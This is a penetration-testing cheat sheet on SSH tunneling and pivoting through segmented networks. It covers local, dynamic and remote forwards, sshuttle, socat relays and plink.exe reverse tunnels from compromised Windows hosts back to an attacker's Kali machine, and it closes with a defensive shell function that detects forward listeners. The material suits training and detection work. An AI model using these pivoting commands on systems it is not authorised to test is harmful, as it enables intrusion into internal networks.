SSH Tunneling

Local Port Forwarding

System              IP address
LHOST               192.168.50.10
APPLICATION SERVER  192.168.100.10
DATABASE SERVER     10.10.100.20
WINDOWS HOST        172.16.50.10

  • LHOST > APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST

Application Server

ssh -N -L 0.0.0.0:4455:172.16.50.10:445 <USERNAME>@10.10.100.20

Kali

smbclient -p 4455 //192.168.100.10/<SHARE> -U <USERNAME>

Dynamic Port Forwarding

Application Server

ssh -N -D 0.0.0.0:9999 <USERNAME>@10.10.100.20

Kali

Edit the /etc/proxychains4.conf file

socks5 192.168.100.10 9999

Test the connection

sudo proxychains smbclient //172.16.50.10/<SHARE> -U <USERNAME> --password=<PASSWORD>

Remote Port Forwarding

Kali

sudo systemctl start ssh
sudo ss -tulpn

Application Server

ssh -N -R 127.0.0.1:2345:10.10.100.20:5432 <USERNAME>@192.168.50.10

Kali

psql -h 127.0.0.1 -p 2345 -U postgres

Remote Dynamic Port Forwarding

Application Server

ssh -N -R 9998 <USERNAME>@192.168.50.10

Kali

Edit the /etc/proxychains4.conf file

socks5 127.0.0.1 9998

Test the connection

sudo proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.10.100.20

Using sshuttle

Application Server

socat TCP-LISTEN:2222,fork TCP:10.10.100.20:22

Kali

sshuttle -r <USERNAME>@192.168.100.10:2222 10.10.100.0/24 172.16.50.0/24
smbclient -L //172.16.50.10/ -U <USERNAME> --password=<PASSWORD>

ssh.exe

Kali

sudo systemctl start ssh
xfreerdp /u:<user> /p:<pass> /v:<ip>

Windows Machine

where ssh
ssh -N -R 9998 kali@<ip_kali>

Kali

ss -ntplu

Edit the /etc/proxychains4.conf file

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9998

Test the connection

proxychains psql -h 10.4.50.215 -U postgres

plink.exe

Kali

Upload plink.exe

find / -name plink.exe 2>/dev/null
/usr/share/windows-resources/binaries/plink.exe

Windows Machine

plink.exe -ssh -l <USERNAME> -pw <PASSWORD> -R 127.0.0.1:9833:127.0.0.1:3389 <kali_ip>

Kali

ss -tulpn
xfreerdp3 /u:<USERNAME> /p:<PASSWORD> /v:127.0.0.1:9833
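
Detecting these forwards

Each forward on this page shows up as a listening socket owned by ssh (-L, -D) or sshd (-R). The following is an added example, not part of the original page: a shell function that flags such listeners in `ss -H -tlnp` output. The function names and the sample lines are constructed for illustration and combine listeners that the commands above would create on different hosts.

```shell
#!/bin/sh
# Constructed sample of `ss -H -tlnp` output (run as root so the process
# column is populated). Columns: State Recv-Q Send-Q Local Peer Process.
sample_ss_output() {
  cat <<'EOF'
LISTEN 0 128 0.0.0.0:22     0.0.0.0:* users:(("sshd",pid=812,fd=3))
LISTEN 0 128 0.0.0.0:4455   0.0.0.0:* users:(("ssh",pid=2101,fd=4))
LISTEN 0 128 127.0.0.1:2345 0.0.0.0:* users:(("sshd",pid=3050,fd=9))
LISTEN 0 128 127.0.0.1:9998 0.0.0.0:* users:(("sshd",pid=3050,fd=11))
LISTEN 0 244 127.0.0.1:5432 0.0.0.0:* users:(("postgres",pid=900,fd=5))
LISTEN 0 128 [::]:22        [::]:*    users:(("sshd",pid=812,fd=4))
EOF
}

# Reads `ss -H -tlnp` output on stdin and prints one line per listener owned
# by ssh or sshd, excluding the daemon's own port (first argument, default 22).
# Output format: <loopback|exposed> <local address:port> <process>
find_ssh_forward_listeners() {
  awk -v sshd_port="${1:-22}" '
    $1 == "LISTEN" && $0 ~ /users:\(\("sshd?"/ {
      addr = $4
      n = split(addr, parts, ":")
      port = parts[n]                       # last field also works for [::]:22
      host = substr(addr, 1, length(addr) - length(port) - 1)
      proc = ($0 ~ /\(\("sshd"/) ? "sshd" : "ssh"
      if (proc == "sshd" && port == sshd_port) next   # normal SSH service
      # A forward bound outside loopback is reachable by other hosts.
      scope = (host ~ /^(127\.|\[::1\])/) ? "loopback" : "exposed"
      print scope, addr, proc
    }'
}

# Stand-alone run over the constructed sample; on a live host use:
#   ss -H -tlnp | find_ssh_forward_listeners
sample_ss_output | find_ssh_forward_listeners
```

On the server side, the sshd_config options AllowTcpForwarding, GatewayPorts and PermitOpen control whether forwards like these can be created at all.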
